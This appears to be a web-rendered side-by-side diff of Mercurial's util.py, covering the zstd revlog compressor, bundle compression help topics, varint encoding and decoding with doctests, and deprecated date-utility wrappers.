3793 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3796 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3794 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3797 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3795
3798
3796 def compress(self, data):
3799 def compress(self, data):
3797 insize = len(data)
3800 insize = len(data)
3798 # Caller handles empty input case.
3801 # Caller handles empty input case.
3799 assert insize > 0
3802 assert insize > 0
3800
3803
3801 if insize < 50:
3804 if insize < 50:
3802 return None
3805 return None
3803
3806
3804 elif insize <= 1000000:
3807 elif insize <= 1000000:
3805 compressed = self._cctx.compress(data)
3808 compressed = self._cctx.compress(data)
3806 if len(compressed) < insize:
3809 if len(compressed) < insize:
3807 return compressed
3810 return compressed
3808 return None
3811 return None
3809 else:
3812 else:
3810 z = self._cctx.compressobj()
3813 z = self._cctx.compressobj()
3811 chunks = []
3814 chunks = []
3812 pos = 0
3815 pos = 0
3813 while pos < insize:
3816 while pos < insize:
3814 pos2 = pos + self._compinsize
3817 pos2 = pos + self._compinsize
3815 chunk = z.compress(data[pos:pos2])
3818 chunk = z.compress(data[pos:pos2])
3816 if chunk:
3819 if chunk:
3817 chunks.append(chunk)
3820 chunks.append(chunk)
3818 pos = pos2
3821 pos = pos2
3819 chunks.append(z.flush())
3822 chunks.append(z.flush())
3820
3823
3821 if sum(map(len, chunks)) < insize:
3824 if sum(map(len, chunks)) < insize:
3822 return ''.join(chunks)
3825 return ''.join(chunks)
3823 return None
3826 return None
3824
3827
3825 def decompress(self, data):
3828 def decompress(self, data):
3826 insize = len(data)
3829 insize = len(data)
3827
3830
3828 try:
3831 try:
3829 # This was measured to be faster than other streaming
3832 # This was measured to be faster than other streaming
3830 # decompressors.
3833 # decompressors.
3831 dobj = self._dctx.decompressobj()
3834 dobj = self._dctx.decompressobj()
3832 chunks = []
3835 chunks = []
3833 pos = 0
3836 pos = 0
3834 while pos < insize:
3837 while pos < insize:
3835 pos2 = pos + self._decompinsize
3838 pos2 = pos + self._decompinsize
3836 chunk = dobj.decompress(data[pos:pos2])
3839 chunk = dobj.decompress(data[pos:pos2])
3837 if chunk:
3840 if chunk:
3838 chunks.append(chunk)
3841 chunks.append(chunk)
3839 pos = pos2
3842 pos = pos2
3840 # Frame should be exhausted, so no finish() API.
3843 # Frame should be exhausted, so no finish() API.
3841
3844
3842 return ''.join(chunks)
3845 return ''.join(chunks)
3843 except Exception as e:
3846 except Exception as e:
3844 raise error.RevlogError(_('revlog decompress error: %s') %
3847 raise error.RevlogError(_('revlog decompress error: %s') %
3845 forcebytestr(e))
3848 forcebytestr(e))
3846
3849
3847 def revlogcompressor(self, opts=None):
3850 def revlogcompressor(self, opts=None):
3848 opts = opts or {}
3851 opts = opts or {}
3849 return self.zstdrevlogcompressor(self._module,
3852 return self.zstdrevlogcompressor(self._module,
3850 level=opts.get('level', 3))
3853 level=opts.get('level', 3))
3851
3854
3852 compengines.register(_zstdengine())
3855 compengines.register(_zstdengine())
3853
3856
3854 def bundlecompressiontopics():
3857 def bundlecompressiontopics():
3855 """Obtains a list of available bundle compressions for use in help."""
3858 """Obtains a list of available bundle compressions for use in help."""
3856 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3859 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3857 items = {}
3860 items = {}
3858
3861
3859 # We need to format the docstring. So use a dummy object/type to hold it
3862 # We need to format the docstring. So use a dummy object/type to hold it
3860 # rather than mutating the original.
3863 # rather than mutating the original.
3861 class docobject(object):
3864 class docobject(object):
3862 pass
3865 pass
3863
3866
3864 for name in compengines:
3867 for name in compengines:
3865 engine = compengines[name]
3868 engine = compengines[name]
3866
3869
3867 if not engine.available():
3870 if not engine.available():
3868 continue
3871 continue
3869
3872
3870 bt = engine.bundletype()
3873 bt = engine.bundletype()
3871 if not bt or not bt[0]:
3874 if not bt or not bt[0]:
3872 continue
3875 continue
3873
3876
3874 doc = pycompat.sysstr('``%s``\n %s') % (
3877 doc = pycompat.sysstr('``%s``\n %s') % (
3875 bt[0], engine.bundletype.__doc__)
3878 bt[0], engine.bundletype.__doc__)
3876
3879
3877 value = docobject()
3880 value = docobject()
3878 value.__doc__ = doc
3881 value.__doc__ = doc
3879 value._origdoc = engine.bundletype.__doc__
3882 value._origdoc = engine.bundletype.__doc__
3880 value._origfunc = engine.bundletype
3883 value._origfunc = engine.bundletype
3881
3884
3882 items[bt[0]] = value
3885 items[bt[0]] = value
3883
3886
3884 return items
3887 return items
3885
3888
3886 i18nfunctions = bundlecompressiontopics().values()
3889 i18nfunctions = bundlecompressiontopics().values()
3887
3890
3888 # convenient shortcut
3891 # convenient shortcut
3889 dst = debugstacktrace
3892 dst = debugstacktrace
3890
3893
3891 def safename(f, tag, ctx, others=None):
3894 def safename(f, tag, ctx, others=None):
3892 """
3895 """
3893 Generate a name that it is safe to rename f to in the given context.
3896 Generate a name that it is safe to rename f to in the given context.
3894
3897
3895 f: filename to rename
3898 f: filename to rename
3896 tag: a string tag that will be included in the new name
3899 tag: a string tag that will be included in the new name
3897 ctx: a context, in which the new name must not exist
3900 ctx: a context, in which the new name must not exist
3898 others: a set of other filenames that the new name must not be in
3901 others: a set of other filenames that the new name must not be in
3899
3902
3900 Returns a file name of the form oldname~tag[~number] which does not exist
3903 Returns a file name of the form oldname~tag[~number] which does not exist
3901 in the provided context and is not in the set of other names.
3904 in the provided context and is not in the set of other names.
3902 """
3905 """
3903 if others is None:
3906 if others is None:
3904 others = set()
3907 others = set()
3905
3908
3906 fn = '%s~%s' % (f, tag)
3909 fn = '%s~%s' % (f, tag)
3907 if fn not in ctx and fn not in others:
3910 if fn not in ctx and fn not in others:
3908 return fn
3911 return fn
3909 for n in itertools.count(1):
3912 for n in itertools.count(1):
3910 fn = '%s~%s~%s' % (f, tag, n)
3913 fn = '%s~%s~%s' % (f, tag, n)
3911 if fn not in ctx and fn not in others:
3914 if fn not in ctx and fn not in others:
3912 return fn
3915 return fn
3913
3916
3914 def readexactly(stream, n):
3917 def readexactly(stream, n):
3915 '''read n bytes from stream.read and abort if less was available'''
3918 '''read n bytes from stream.read and abort if less was available'''
3916 s = stream.read(n)
3919 s = stream.read(n)
3917 if len(s) < n:
3920 if len(s) < n:
3918 raise error.Abort(_("stream ended unexpectedly"
3921 raise error.Abort(_("stream ended unexpectedly"
3919 " (got %d bytes, expected %d)")
3922 " (got %d bytes, expected %d)")
3920 % (len(s), n))
3923 % (len(s), n))
3921 return s
3924 return s
3922
3925
3923 def uvarintencode(value):
3926 def uvarintencode(value):
3924 """Encode an unsigned integer value to a varint.
3927 """Encode an unsigned integer value to a varint.
3925
3928
3926 A varint is a variable length integer of 1 or more bytes. Each byte
3929 A varint is a variable length integer of 1 or more bytes. Each byte
3927 except the last has the most significant bit set. The lower 7 bits of
3930 except the last has the most significant bit set. The lower 7 bits of
3928 each byte store the 2's complement representation, least significant group
3931 each byte store the 2's complement representation, least significant group
3929 first.
3932 first.
3930
3933
3931 >>> uvarintencode(0)
3934 >>> uvarintencode(0)
3932 '\\x00'
3935 '\\x00'
3933 >>> uvarintencode(1)
3936 >>> uvarintencode(1)
3934 '\\x01'
3937 '\\x01'
3935 >>> uvarintencode(127)
3938 >>> uvarintencode(127)
3936 '\\x7f'
3939 '\\x7f'
3937 >>> uvarintencode(1337)
3940 >>> uvarintencode(1337)
3938 '\\xb9\\n'
3941 '\\xb9\\n'
3939 >>> uvarintencode(65536)
3942 >>> uvarintencode(65536)
3940 '\\x80\\x80\\x04'
3943 '\\x80\\x80\\x04'
3941 >>> uvarintencode(-1)
3944 >>> uvarintencode(-1)
3942 Traceback (most recent call last):
3945 Traceback (most recent call last):
3943 ...
3946 ...
3944 ProgrammingError: negative value for uvarint: -1
3947 ProgrammingError: negative value for uvarint: -1
3945 """
3948 """
3946 if value < 0:
3949 if value < 0:
3947 raise error.ProgrammingError('negative value for uvarint: %d'
3950 raise error.ProgrammingError('negative value for uvarint: %d'
3948 % value)
3951 % value)
3949 bits = value & 0x7f
3952 bits = value & 0x7f
3950 value >>= 7
3953 value >>= 7
3951 bytes = []
3954 bytes = []
3952 while value:
3955 while value:
3953 bytes.append(pycompat.bytechr(0x80 | bits))
3956 bytes.append(pycompat.bytechr(0x80 | bits))
3954 bits = value & 0x7f
3957 bits = value & 0x7f
3955 value >>= 7
3958 value >>= 7
3956 bytes.append(pycompat.bytechr(bits))
3959 bytes.append(pycompat.bytechr(bits))
3957
3960
3958 return ''.join(bytes)
3961 return ''.join(bytes)
3959
3962
3960 def uvarintdecodestream(fh):
3963 def uvarintdecodestream(fh):
3961 """Decode an unsigned variable length integer from a stream.
3964 """Decode an unsigned variable length integer from a stream.
3962
3965
3963 The passed argument is anything that has a ``.read(N)`` method.
3966 The passed argument is anything that has a ``.read(N)`` method.
3964
3967
3965 >>> try:
3968 >>> try:
3966 ... from StringIO import StringIO as BytesIO
3969 ... from StringIO import StringIO as BytesIO
3967 ... except ImportError:
3970 ... except ImportError:
3968 ... from io import BytesIO
3971 ... from io import BytesIO
3969 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3972 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3970 0
3973 0
3971 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3974 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3972 1
3975 1
3973 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3976 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3974 127
3977 127
3975 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3978 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3976 1337
3979 1337
3977 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3980 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3978 65536
3981 65536
3979 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3982 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3980 Traceback (most recent call last):
3983 Traceback (most recent call last):
3981 ...
3984 ...
3982 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3985 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3983 """
3986 """
3984 result = 0
3987 result = 0
3985 shift = 0
3988 shift = 0
3986 while True:
3989 while True:
3987 byte = ord(readexactly(fh, 1))
3990 byte = ord(readexactly(fh, 1))
3988 result |= ((byte & 0x7f) << shift)
3991 result |= ((byte & 0x7f) << shift)
3989 if not (byte & 0x80):
3992 if not (byte & 0x80):
3990 return result
3993 return result
3991 shift += 7
3994 shift += 7
3992
3995
3993 ###
3996 ###
3994 # Deprecation warnings for util.py splitting
3997 # Deprecation warnings for util.py splitting
3995 ###
3998 ###
3996
3999
3997 defaultdateformats = dateutil.defaultdateformats
4000 defaultdateformats = dateutil.defaultdateformats
3998
4001
3999 extendeddateformats = dateutil.extendeddateformats
4002 extendeddateformats = dateutil.extendeddateformats
4000
4003
4001 def makedate(*args, **kwargs):
4004 def makedate(*args, **kwargs):
4002 msg = ("'util.makedate' is deprecated, "
4005 msg = ("'util.makedate' is deprecated, "
4003 "use 'utils.dateutil.makedate'")
4006 "use 'utils.dateutil.makedate'")
4004 nouideprecwarn(msg, "4.6")
4007 nouideprecwarn(msg, "4.6")
4005 return dateutil.makedate(*args, **kwargs)
4008 return dateutil.makedate(*args, **kwargs)
4006
4009
4007 def datestr(*args, **kwargs):
4010 def datestr(*args, **kwargs):
4008 msg = ("'util.datestr' is deprecated, "
4011 msg = ("'util.datestr' is deprecated, "
4009 "use 'utils.dateutil.datestr'")
4012 "use 'utils.dateutil.datestr'")
4010 nouideprecwarn(msg, "4.6")
4013 nouideprecwarn(msg, "4.6")
4011 debugstacktrace()
4014 debugstacktrace()
4012 return dateutil.datestr(*args, **kwargs)
4015 return dateutil.datestr(*args, **kwargs)
4013
4016
4014 def shortdate(*args, **kwargs):
4017 def shortdate(*args, **kwargs):
4015 msg = ("'util.shortdate' is deprecated, "
4018 msg = ("'util.shortdate' is deprecated, "
4016 "use 'utils.dateutil.shortdate'")
4019 "use 'utils.dateutil.shortdate'")
4017 nouideprecwarn(msg, "4.6")
4020 nouideprecwarn(msg, "4.6")
4018 return dateutil.shortdate(*args, **kwargs)
4021 return dateutil.shortdate(*args, **kwargs)
4019
4022
4020 def parsetimezone(*args, **kwargs):
4023 def parsetimezone(*args, **kwargs):
4021 msg = ("'util.parsetimezone' is deprecated, "
4024 msg = ("'util.parsetimezone' is deprecated, "
4022 "use 'utils.dateutil.parsetimezone'")
4025 "use 'utils.dateutil.parsetimezone'")
4023 nouideprecwarn(msg, "4.6")
4026 nouideprecwarn(msg, "4.6")
4024 return dateutil.parsetimezone(*args, **kwargs)
4027 return dateutil.parsetimezone(*args, **kwargs)
4025
4028
4026 def strdate(*args, **kwargs):
4029 def strdate(*args, **kwargs):
4027 msg = ("'util.strdate' is deprecated, "
4030 msg = ("'util.strdate' is deprecated, "
4028 "use 'utils.dateutil.strdate'")
4031 "use 'utils.dateutil.strdate'")
4029 nouideprecwarn(msg, "4.6")
4032 nouideprecwarn(msg, "4.6")
4030 return dateutil.strdate(*args, **kwargs)
4033 return dateutil.strdate(*args, **kwargs)
4031
4034
4032 def parsedate(*args, **kwargs):
4035 def parsedate(*args, **kwargs):
4033 msg = ("'util.parsedate' is deprecated, "
4036 msg = ("'util.parsedate' is deprecated, "
4034 "use 'utils.dateutil.parsedate'")
4037 "use 'utils.dateutil.parsedate'")
4035 nouideprecwarn(msg, "4.6")
4038 nouideprecwarn(msg, "4.6")
4036 return dateutil.parsedate(*args, **kwargs)
4039 return dateutil.parsedate(*args, **kwargs)
4037
4040
4038 def matchdate(*args, **kwargs):
4041 def matchdate(*args, **kwargs):
4039 msg = ("'util.matchdate' is deprecated, "
4042 msg = ("'util.matchdate' is deprecated, "
4040 "use 'utils.dateutil.matchdate'")
4043 "use 'utils.dateutil.matchdate'")
4041 nouideprecwarn(msg, "4.6")
4044 nouideprecwarn(msg, "4.6")
4042 return dateutil.matchdate(*args, **kwargs)
4045 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now